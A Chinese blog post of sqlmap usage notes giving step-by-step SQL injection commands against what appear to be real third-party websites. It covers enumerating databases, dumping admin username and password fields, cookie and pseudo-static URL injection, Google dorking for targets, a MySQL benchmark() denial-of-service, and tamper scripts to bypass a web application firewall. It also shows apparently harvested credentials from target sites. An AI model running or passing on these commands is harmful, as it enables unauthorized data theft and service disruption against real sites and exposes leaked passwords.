美文网首页Web安全
Sqlmap使用笔记与技巧总结

Sqlmap使用笔记与技巧总结

作者: 简书这个地方快倒闭了 | 来源:发表于2017-03-29 16:49 被阅读106次

查找find / -name  sqlmap

sqlmap地址/usr/share/golismero/tools/sqlmap

aqlmap 扫描文档存在地址  [INFO] fetched data logged to text files under '/usr/share/golismero/tools/sqlmap/output/www.cowinbio.com'

sqlmap大部分注入步骤相同(WEB深度剖析)

1.判断是否存在注入点:

sqlmap.py -u "http://www.nsu-cst.com/"

2.获取数据库:

sqlmap.py -u "http://www.nsu-cst.com/"   --dbs

3.查看当前应用程序所用数据库:

sqlmap.py -u "http://www.nsu-cst.com/"   --current-db

4.列出数据库的所有表:

sqlmap.py -u "http://www.nsu-cst.com/"   --table -D “XXX(当前数据库名称)”

5.读取指定表中的字段名称:

sqlmap.py -u "http://www.nsu-cst.com/"  --columns -T “YYY(表的的名称)”-D “XXX(当前数据库名称)”

6.读取指定字段内容:

sqlmap.py -u "http://www.nsu-cst.com/"  --dump -C ”Username,PassWord (敏感字段名称)“ -T “[YYY](表的的名称)”-D “XXX(当前数据库名称)”

ACCESS数据库情况下的扫描

1--sqlmap -u "http://www.nsu-cst.com/"      //扫描注入地址 并返回信息  判断数据库

2.--sqlmap -u "http://www.nsu-cst.com/"  --tables 猜表

3. --sqlmap -u "http://www.zh234.com/ship.asp?id=4"  --columns -T admin   猜字段

4. --sqlmap -u "http://www.zh234.com/ship.asp?id=4"  --dump -T admin -C “username,password(可能的字段)”  猜字段里面的内容    (pwd=netjzg$3262132)

MYSQL数据库情况下的扫描http://www.t123.ie/interior.php?id=2

1.获取数据库  (--sqlmap -uhttp://www.123.ie/interior.php?id=2--dbs)

--sqlmap -uhttp://www.123.ie/interior.php?id=2-D(指定一个数据库) myslibrary(数据库名称)  --tables     获取数据库当中的表

2.获取表中的字段(通过第1步寻找关键数据库名称)

--sqlmap -uhttp://www.123.ie/interior.php?id=2-D myslibrary -T hy—admin(数据库表名) --columns(字段的意思)

3.获取字段中的内容

--sqlmap -uhttp://www.t123s.ie/interior.php?id=2-D myslibrary -T hy—admin(数据库表名) -C id,user(字段名称) --dump

cookies注入http://www.123.org/jsj/DownloadShow.asp?id=9

1.sqlmap -u "http://www.123.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2      (可用于判断数据库,猜表等,please enter number of threads? [Enter for 1 (current)]  输入线程 测试时为10--》等待猜解)

2.sqlmap -u "http://www.123.org/jsj/DownloadShow.asp" --cookie "id=9" --columns -T admin(获取此字段) --level 2

3.查看敏感字段中的内容

sqlmap -u "http://www.123.org/jsj/DownloadShow.asp" --cookie "id=9" --dump -T admin -C “username,password” --level 2   (admin chenli)

POST登录框注入

伪静态注入http://sfl.123.edu.cn/index.php/Index/view/id/40.html

1.获取数据库

sqlmap.py -uhttp://sfl.f123.edu.cn/index.php/Index/view/id/40*.html--dbs   【注意在存在注入的地方加一个”*“】

2.获取数据库当中的表

sqlmap.py -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html-D preem(敏感的数据库名称) --tables

3.获取表中的字段

sqlmap.py -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html-D preem(敏感的数据库名称)-T pe_user(敏感的表名称)  --columns

4.获取敏感字段的内容

sqlmap.py -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html-D preem(敏感的数据库名称)-T pe_user(敏感的表名称) -C password

5.关于请求延时的绕过命令

(1)sqlmap.py --dbs -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html--delay 1    //后面的参数是秒的意思,任意设置(可绕过网站保护措施,意思就是隔一秒访问一次正常页面)

(2)sqlmap.py--dbs -uhttp://sfl.123.edu.cn/index.php/Index/view/id/40*.html--safe-freq 3  //后面参数任意设置,结果同样是获取数据库

sqlmap中的谷歌搜索

可以在sqlmap里进行遍历:

sqlmap.py -g inurl:php?id=

Mysql DOS攻击

1.sqlmap -uhttp://192.168.159.1/news.php?id=1--sql-shell   //首先获得一个shell

2.在shell这个地方执行select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

绕过WAF防火墙

使用:sqlmap.py -uhttp://192.168.159.1/news.php?id=1-v 3 --dbs --batch --tamper "spaceZmorehash.py"

//利用spaceZmorehash.py编码的脚本获取数据库

其他sqlmap脚本 "space2hash.py " " base64encode.py ""charencode.py",

不同的脚本针对不同的效果 ,自由发挥。

其他技巧

1.注入网站时查看权限  sqlmap.py -uhttp://192.168.159.1/news.php?id=1--privileges

相关文章

网友评论

    本文标题:Sqlmap使用笔记与技巧总结

    本文链接:https://www.haomeiwen.com/subject/cwqyottx.html